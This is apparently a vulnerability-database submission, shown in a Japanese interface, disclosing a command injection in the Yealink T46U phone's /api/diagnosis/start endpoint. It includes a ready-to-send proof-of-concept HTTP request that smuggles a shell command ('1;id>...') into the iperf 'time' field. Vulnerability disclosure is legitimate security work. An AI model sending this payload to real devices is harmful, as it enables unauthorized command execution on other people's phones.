| タイトル | yealink T46U 108.86.0.118 Command Injection |
|---|
| 説明 | Yealink T46U phone firmware `x.x.x.x` contains a command injection vulnerability in the Web FastCGI service `fcgiserver`. The vulnerable endpoint is:
```text
POST /api/diagnosis/start
```
The endpoint is handled by `mod_diagnose.CommandShellByType()`. In the iperf client branch, the `time` request parameter is concatenated into a shell command without quoting or validation when the request includes a non-empty `protocal` parameter.
poc
POST /api/diagnosis/start?p=Setting&t=<timestamp> HTTP/1.1
Host: <target>
Cookie: JSESSIONID=<valid-session>
X-Csrftoken: <valid-token>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
command=iperf&mode=client&address=127.0.0.1&protocal=IPv4&time=1;id>/tmp/diagnose_iperf_poc |
|---|
| ソース | ⚠️ http://cdn2.v50to.cc/T46U/T46U_mod_diagnose_CommandShellByType_iperf_time_cmd_injection.zip |
|---|
| ユーザー | CookedMelon (UID 52513) |
|---|
| 送信 | 2026年05月20日 17:33 (3 月 ago) |
|---|
| モデレーション | 2026年06月14日 15:54 (25 days later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 370862 [Yealink SIP-T46U 108.86.0.118 Web FastCGI Service /api/diagnosis/start mod_diagnose.CommandShellByType 時刻 特権昇格] |
|---|
| ポイント | 20 |
|---|